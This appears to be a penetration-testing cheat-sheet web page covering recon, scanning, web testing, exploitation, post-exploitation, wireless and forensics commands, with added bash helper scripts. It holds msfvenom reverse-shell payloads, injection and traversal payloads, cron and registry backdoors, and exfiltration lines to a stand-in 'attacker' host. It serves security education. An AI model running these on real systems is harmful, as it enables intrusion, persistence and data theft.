PK Rain Technology
Your comprehensive reference for ethical hacking, penetration testing, and cybersecurity commands
⚠️ Legal Disclaimer
This website is for educational purposes only. All techniques and tools should only be used on systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal and punishable by law.
🔍 Reconnaissance & Information Gathering
Passive Reconnaissance
WHOIS Lookup
Gather domain registration information, including registrar details, creation dates, and contact information.
whois example.com
whois -h whois.internic.net example.com    # Query a specific WHOIS server
whois 192.168.1.1                          # IP lookup; a private (RFC 1918) address only returns the reserved-block record
Example Output:
Domain Name: EXAMPLE.COM
Registry Domain ID: 2336799_DOMAIN_COM-VRSN
Registrar: IANA Reserved Domain
DNS Enumeration
Discover DNS records, subdomains, and network infrastructure information.
dig example.com
dig @8.8.8.8 example.com MX    # Ask a specific resolver for MX records
dig example.com NS
nslookup example.com
host -a example.com
fierce -dns example.com        # Classic Perl fierce; the Python rewrite takes --domain example.com
Google Dorking
Use advanced Google search operators to find sensitive information and potential security vulnerabilities.
site:example.com filetype:pdf
site:example.com inurl:admin
intitle:"index of" site:example.com
inurl:"/admin/login.php"
filetype:sql "password"
Active Reconnaissance
Network Discovery
Identify live hosts and network topology using various scanning techniques.
nmap -sn 192.168.1.0/24        # Host discovery only, no port scan (ARP on the local segment)
fping -a -g 192.168.1.0/24     # List hosts that answer ICMP
arp-scan -l                    # ARP sweep of the local subnet (needs root)
netdiscover -r 192.168.1.0/24
🌐 Network Scanning
Port Scanning with Nmap
Basic Scans
Fundamental port scanning techniques for discovering open ports and services.
nmap target
nmap -sS target    # TCP SYN scan (needs root)
nmap -sU target    # UDP scan
nmap -sT target    # TCP connect scan (works unprivileged)
nmap -sA target    # ACK scan: maps firewall rules, does not report open ports
Advanced Scans
Comprehensive scanning with service detection, OS fingerprinting, and vulnerability assessment.
nmap -A target                 # Aggressive scan (OS, version, scripts, traceroute)
nmap -sC -sV target            # Default scripts + version detection
nmap -p- target                # Scan all 65535 ports
nmap --top-ports 1000 target   # Scan top 1000 ports
nmap --script vuln target      # Vulnerability scripts
Stealth and Evasion
Techniques to avoid detection by firewalls and intrusion detection systems.
nmap -f target                 # Fragment packets
nmap -D RND:10 target          # Decoy scan: your real address is mixed in with 10 random ones
nmap --source-port 53 target   # Source port manipulation (abuses firewalls that trust DNS replies)
nmap -T1 target                # Slow scan timing; expect hours on a full port range
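Scan results are only useful once you can feed them into the next step. The script below is an added example, not part of this site's cheat sheet: a bash function that parses nmap grepable output (`-oG`) into one line per open port, plus a helper that picks hosts with a given port open. The scan text it works on is constructed sample data (the addresses, versions and nmap version number are assumptions), not a real scan.

```bash
#!/usr/bin/env bash
# Added example: parse nmap grepable (-oG) output into "host port/proto service [version]"
# lines so the results can be fed to later tools (e.g. picking hosts for an NSE script).

# Constructed sample of `nmap -sS -sV -oG - 192.168.1.0/24` output; not a real scan.
# Real -oG output separates fields with tabs; the parser accepts tabs or spaces.
SAMPLE_OG='# Nmap 7.94 scan initiated as: nmap -sS -sV -oG - 192.168.1.0/24
Host: 192.168.1.10 ()   Status: Up
Host: 192.168.1.10 ()   Ports: 22/open/tcp//ssh//OpenSSH 8.9p1/, 80/open/tcp//http//nginx 1.18.0/, 443/closed/tcp//https///   Ignored State: filtered (997)
Host: 192.168.1.20 ()   Status: Up
Host: 192.168.1.20 ()   Ports: 445/open/tcp//microsoft-ds//Windows Server 2019 microsoft-ds/, 3389/open/tcp//ms-wbt-server///   Ignored State: closed (998)
# Nmap done -- 256 IP addresses (2 hosts up) scanned in 60.00 seconds'

open_ports() {
    # Reads -oG text on stdin. Each "Ports:" entry has the layout
    # port/state/proto/owner/service/rpcinfo/version/ ; nmap writes any "/"
    # inside the version string as "|", so splitting on "/" is safe.
    awk '
    /^Host:/ && /Ports:/ {
        host = $2
        line = $0
        sub(/.*Ports: /, "", line)
        sub(/[ \t]+Ignored State:.*/, "", line)
        n = split(line, entries, /, /)
        for (i = 1; i <= n; i++) {
            split(entries[i], f, "/")
            if (f[2] != "open") continue
            svc = f[5]
            if (f[7] != "") svc = svc " " f[7]
            printf "%s %s/%s %s\n", host, f[1], f[3], svc
        }
    }'
}

hosts_with_port() {
    # Hosts with TCP port $1 open, e.g. hosts_with_port 445 to pick smb-vuln-ms17-010 targets.
    open_ports | awk -v p="$1/tcp" '$2 == p { print $1 }'
}

if [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "$SAMPLE_OG" | open_ports
    printf '%s\n' "$SAMPLE_OG" | hosts_with_port 445
fi
```

Run it with `--demo` to see the four open ports from the sample and the one host that answers on 445. On a real engagement replace the sample with `nmap ... -oG - targets | open_ports`; the `Ignored State` tail and closed/filtered entries are dropped so only actionable ports remain.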
🌍 Web Application Testing
Directory Enumeration
Discover hidden directories, files, and endpoints in web applications.
gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt
dirb http://target
dirsearch -u http://target -e php,html,js
ffuf -w wordlist.txt -u http://target/FUZZ
SQL Injection Testing
Automated SQL injection detection and exploitation using SQLMap.
sqlmap -u "http://target/page.php?id=1"                                          # Test the id parameter
sqlmap -u "http://target/page.php?id=1" --dbs                                    # Enumerate databases
sqlmap -u "http://target/page.php?id=1" -D database --tables
sqlmap -u "http://target/page.php?id=1" -D database -T table --columns
sqlmap -u "http://target/page.php?id=1" -D database -T table -C column --dump
Web Vulnerability Scanners
Comprehensive web application security assessment tools.
nikto -h http://target
nikto -h target -p 80,443,8080    # Scan several ports
wpscan --url http://target        # WordPress-specific checks
whatweb http://target             # Technology fingerprinting
💻 System Enumeration
Linux System Information
Gather detailed information about Linux systems for privilege escalation and lateral movement.
uname -a            # System information
whoami              # Current user
id                  # User ID and groups
cat /etc/passwd     # User accounts
cat /etc/shadow     # Password hashes (readable only as root)
ps aux              # Running processes
netstat -antup      # Network connections (process names of other users need root)
Windows System Information
Essential Windows enumeration commands for post-exploitation activities.
systeminfo                      # System information
whoami /all                     # Current user privileges
net user                        # List users
net localgroup administrators   # Admin group members
tasklist                        # Running processes
netstat -an                     # Network connections
File System Exploration
Commands to explore file systems and find sensitive information or privilege escalation vectors.
# Linux
find / -perm -4000 2>/dev/null      # Find SUID files
find / -writable 2>/dev/null        # Find writable files
locate "*.conf"                     # Find config files (quote the glob so the shell does not expand it first)
# Windows
dir C:\ /s /b | findstr password    # Search for password files
icacls C:\                          # Check permissions
🔓 Vulnerability Assessment
OpenVAS
Open-source vulnerability scanner for comprehensive network security assessment. On current Kali releases the wrapper scripts are named gvm-setup, gvm-start, gvm-stop and gvm-check-setup; the older openvas-* names below are from earlier releases.
openvas-setup          # Initial setup
openvas-start          # Start services
openvas-stop           # Stop services
openvas-check-setup    # Verify installation
Nessus
Professional vulnerability scanner with extensive plugin database.
/opt/nessus/sbin/nessuscli    # Full path to the CLI on Linux installs
nessuscli update              # Update plugins
nessuscli scan --list         # Verify against `nessuscli help` for your version; scans are normally created and run from the web UI or REST API
nessuscli scan --stop
Manual Vulnerability Testing
Manual testing techniques for specific vulnerabilities and security misconfigurations.
# Test for common vulnerabilities
curl -H "User-Agent: () { :; }; echo vulnerable" http://target/ # Shellshock; point it at a CGI endpoint that spawns bash, not the site root
nmap --script smb-vuln-ms17-010 target # EternalBlue
testssl.sh target # SSL/TLS testing
⚡ Exploitation
Metasploit Framework
The most popular exploitation framework for penetration testing and vulnerability research.
msfconsole                                        # Start Metasploit
search ms17-010                                   # Search for exploits by keyword
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target
set LHOST attacker_ip
exploit
Payload Generation
Create custom payloads for various platforms and delivery methods.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker LPORT=4444 -f exe > payload.exe
msfvenom -p linux/x86/shell_reverse_tcp LHOST=attacker LPORT=4444 -f elf > payload
msfvenom -p php/meterpreter/reverse_tcp LHOST=attacker LPORT=4444 -f php > payload.php
Manual Exploitation
Manual exploitation techniques and proof-of-concept attacks.
# Buffer overflow testing
python3 -c "print('A' * 100)"    # Python 3 syntax; the old form was python -c "print 'A' * 100"
# Command injection (append to a parameter that reaches a shell)
; cat /etc/passwd
| whoami
`id`
# Path traversal
../../../etc/passwd
....//....//....//etc/passwd     # Survives filters that delete "../" once: each "....//" collapses to "../"
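The `....//` payload above only makes sense once you see what the filter it targets does to it. The script below is an added example, not code from this site: it implements the naive "delete `../`" filter, shows that it turns the payload into a working traversal, and contrasts it with a check that normalises the path and requires the result to stay under the document root. The base directory `/var/www/files` and the file names are assumptions.

```bash
#!/usr/bin/env bash
# Added example: why "....//....//....//etc/passwd" works, and how to check a
# user-supplied path properly. Neither function comes from the original page.

strip_traversal() {
    # The naive filter many applications use: delete every "../".
    # "....//" contains exactly one "../" in its middle; deleting it leaves "../".
    printf '%s\n' "$1" | sed 's#\.\./##g'
}

canonicalize() (
    # Pure-string normalisation of an absolute path: collapses "//", "." and "..".
    # Never touches the filesystem, so it is safe on untrusted input. The body runs
    # in a subshell so the IFS change and "set -f" (no globbing) stay local.
    set -f; IFS='/'; out=''
    for seg in $1; do
        case "$seg" in
            ''|'.') ;;                      # empty (from "//" or the leading "/") or ".": skip
            '..')   out="${out%/*}" ;;      # pop one component; stays at root if already there
            *)      out="$out/$seg" ;;
        esac
    done
    printf '%s\n' "${out:-/}"
)

resolve_under() {
    # Hardened check: join base and user path, normalise, then require the result
    # to remain inside the base directory. $1 = canonical base dir, $2 = user input.
    local base="$1" full
    full=$(canonicalize "$base/$2")
    case "$full" in
        "$base"/*) printf '%s\n' "$full"; return 0 ;;
        *)         printf 'rejected: %s escapes %s\n' "$full" "$base" >&2; return 1 ;;
    esac
}

if [ "${1:-}" = "--demo" ]; then
    payload='....//....//....//etc/passwd'
    strip_traversal "$payload"                                     # ../../../etc/passwd
    resolve_under /var/www/files "$(strip_traversal "$payload")"   # rejected: /etc/passwd escapes /var/www/files
    resolve_under /var/www/files 'reports/../2024/q1.pdf'          # /var/www/files/2024/q1.pdf
fi
```

Note the order of operations in the vulnerable case: the filter is what manufactures the `../` sequences. Without the filter, `....//` is just an odd directory name that stays under the base; with it, the request resolves to `/etc/passwd`. The hardened check does not try to sanitise anything, it normalises and then compares prefixes, which is the same approach as resolving with `realpath` and checking the result.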
🎯 Post-Exploitation
Privilege Escalation
Techniques to escalate privileges on compromised systems.
# Linux privilege escalation
sudo -l                           # Check sudo permissions
cat /etc/crontab                  # Check cron jobs
find / -perm -4000 2>/dev/null    # Find SUID binaries
# Windows privilege escalation
whoami /priv                      # Check privileges
net localgroup administrators     # Check admin group
wmic service list brief           # List services
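The SUID `find` appears twice on this page, under File System Exploration and again here, and on a real host it returns dozens of legitimate entries. The script below is an added example (not from this site) of the step that follows: diff the list against a known-good baseline so only the unexpected binaries need a manual look, typically against GTFOBins. It builds a constructed directory tree with `mktemp` instead of scanning `/`, and the file names in that tree are assumptions.

```bash
#!/usr/bin/env bash
# Added example: list SUID binaries under a root and diff them against a
# known-good baseline so only unexpected entries need attention.

find_suid() {
    # $1 = directory to search (use "/" on a real host). -xdev keeps the search on one filesystem.
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

unexpected_suid() {
    # $1 = directory, $2 = baseline file with one expected SUID path per line,
    # relative to $1 (e.g. usr/bin/passwd). Prints entries missing from the baseline;
    # exit status 0 if any were found, 1 if the set matches the baseline exactly.
    local root="$1" baseline="$2"
    find_suid "$root" | sed "s#^$root/##" | grep -vxF -f "$baseline"
}

make_fixture() {
    # Constructed test tree, not a real system: three SUID files, one normal file,
    # and a baseline listing the two expected ones. tmp/.x is the planted oddity.
    local root="$1"
    mkdir -p "$root/usr/bin" "$root/tmp"
    for f in usr/bin/passwd usr/bin/sudo tmp/.x; do
        : > "$root/$f"
        chmod 4755 "$root/$f"
    done
    : > "$root/usr/bin/ls"
    chmod 0755 "$root/usr/bin/ls"
    printf '%s\n' usr/bin/passwd usr/bin/sudo > "$root/baseline.txt"
}

if [ "${1:-}" = "--demo" ]; then
    root=$(mktemp -d)
    make_fixture "$root"
    unexpected_suid "$root" "$root/baseline.txt"    # prints tmp/.x
    rm -rf "$root"
fi
```

A baseline captured from a clean install of the same distribution release is the practical input for `unexpected_suid`; a SUID file under `/tmp`, a home directory or a web root is the kind of hit that should never be in it.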
Persistence
Maintain access to compromised systems through various persistence mechanisms.
# Linux persistence
(crontab -l 2>/dev/null; echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker/4444 0>&1'") | crontab -    # Append; a bare "echo ... | crontab -" would replace the user's whole crontab
echo "ssh-rsa AAAAB3... attacker@kali" >> ~/.ssh/authorized_keys
# Windows persistence
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v backdoor /t REG_SZ /d "C:\backdoor.exe"
schtasks /create /sc minute /mo 1 /tn backdoor /tr C:\backdoor.exe
Data Exfiltration
Methods to extract sensitive data from compromised systems.
# Data transfer methods
scp file.txt user@attacker:/tmp/
nc -w 3 attacker 4444 < file.txt                 # Needs a listener (nc -l) on the attacker side
curl -X POST -d @file.txt http://attacker/upload
python3 -m http.server 8000                      # Host files for download (Python 2: python -m SimpleHTTPServer 8000)
📡 Wireless Network Testing
WiFi Reconnaissance
Discover and analyze wireless networks in the vicinity.
iwconfig                 # Show wireless interfaces
iwlist wlan0 scan        # Scan for networks (interface name required)
airodump-ng wlan0mon     # Monitor mode scanning
wash -i wlan0mon         # WPS-enabled networks
WPA/WPA2 Attacks
Attack WPA/WPA2 encrypted wireless networks using various techniques.
airmon-ng start wlan0                          # Put the card in monitor mode first (creates wlan0mon)
aireplay-ng -0 5 -a [BSSID] wlan0mon           # Deauth clients to force a fresh 4-way handshake
aircrack-ng -w wordlist.txt capture.cap        # Dictionary attack on the captured handshake
hashcat -m 2500 capture.hccapx wordlist.txt    # Legacy hccapx mode; current hashcat uses -m 22000 with .hc22000 files
WEP Attacks
Attack legacy WEP encryption (rarely used but still encountered).
aircrack-ng -b [BSSID] capture.cap       # Recover the key from captured IVs
aireplay-ng -1 0 -a [BSSID] wlan0mon     # Fake authentication
aireplay-ng -3 -b [BSSID] wlan0mon       # ARP replay to generate IVs
🔬 Digital Forensics
Memory Analysis
Analyze memory dumps for evidence and artifacts using the Volatility framework. The commands below use Volatility 2 syntax; Volatility 3 drops the --profile option and names plugins by OS (for example windows.pslist).
volatility -f memory.dump imageinfo                          # Identify the profile to use
volatility -f memory.dump --profile=profile pslist           # Process list
volatility -f memory.dump --profile=profile netscan          # Network connections
volatility -f memory.dump --profile=profile filescan         # File objects in memory
Network Forensics
Analyze network traffic and packet captures for security incidents.
tshark -r capture.pcap
tshark -r capture.pcap -Y "http"    # Display filter
tcpdump -r capture.pcap
wireshark capture.pcap
File System Analysis
Examine file systems and recover deleted files for forensic investigation.
autopsy                            # GUI front-end to The Sleuth Kit
# The Sleuth Kit itself is a set of command-line tools (mmls, fls, icat), not a single "sleuthkit" binary
foremost -i disk.img               # File carving
strings disk.img | grep password   # Quick keyword sweep; strings -t d keeps the byte offsets
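The `strings | grep password` sweep above tells you that a credential exists somewhere in the image but throws away where. The script below is an added example, not part of this site: it reports each hit with its byte offset, carves the bytes at that offset, and dumps the surrounding context, which is what you need to map the hit back to a file or block with The Sleuth Kit. The "image" it runs on is a constructed byte string written to a temp file, and the credential in it is made up.

```bash
#!/usr/bin/env bash
# Added example: keyword hits in a raw image with their byte offsets, plus
# helpers to carve and inspect the bytes around a hit.

credential_hits() {
    # Print "offset:match" for credential-looking tokens in $1 (raw disk image or memory dump).
    # -a treats binary as text, -b reports the byte offset, -o prints only the matching part,
    # so the offset printed is the offset of the token itself, not of its "line".
    grep -aboiE 'pass(word|wd)?[=:][^[:space:][:cntrl:]]+' "$1"
}

carve() {
    # Extract $3 bytes starting at byte offset $2 from image $1 (bs=1 so skip/count are bytes).
    dd if="$1" bs=1 skip="$2" count="$3" 2>/dev/null
}

context() {
    # Character dump of $3 bytes either side of offset $2 in image $1, with decimal addresses,
    # to see what surrounds a hit (config syntax, a log line, a binary structure).
    local start=$(( $2 > $3 ? $2 - $3 : 0 ))
    od -A d -c -j "$start" -N $(( 2 * $3 )) "$1"
}

if [ "${1:-}" = "--demo" ]; then
    # Constructed sample image: NUL-separated blobs with one credential inside.
    img=$(mktemp)
    printf 'AAAA\0\0BBBBpassword=hunter2\0CCC' > "$img"
    credential_hits "$img"         # 10:password=hunter2
    carve "$img" 10 16; echo       # password=hunter2
    context "$img" 10 8
    rm -f "$img"
fi
```

With a real image, feed an offset from `credential_hits` to `mmls` (to find the partition it lies in) and then `ifind`/`ffind` from The Sleuth Kit to get the owning file, instead of re-running `strings` and guessing.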